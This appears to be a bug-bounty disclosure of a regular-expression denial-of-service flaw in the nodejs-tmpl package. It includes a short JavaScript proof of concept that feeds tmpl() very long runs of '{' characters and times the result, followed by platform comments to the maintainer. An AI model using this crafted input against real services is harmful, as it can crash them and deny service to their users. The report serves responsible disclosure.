Inefficient Regular Expression Complexity in daaku/nodejs-tmpl
Valid
Reported on
Sep 4th 2021
✍️ Description
It allows cause a denial of service when formatting crafted string.
🕵️♂️ Proof of Concept
// PoC.js
var tmpl = require("tmpl")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = ""+"{".repeat(i*10000)+"answer";
tmpl(attack_str, { answer: 42 })
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
💥 Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Occurrences
We created a
GitHub Issue
asking the maintainers to create a
SECURITY.md
2 years ago
Hey Yeting, I've just contacted the maintainer about this report for you. Good job!
We have contacted a member of the
daaku/nodejs-tmpl
team and are waiting to hear back
2 years ago
Thank you for your information @admin and thank you for your confirmation @daaku
@daaku - are you able to mark as valid and confirm fix, so that the researcher gets rewarded for their efforts!
to join this conversation
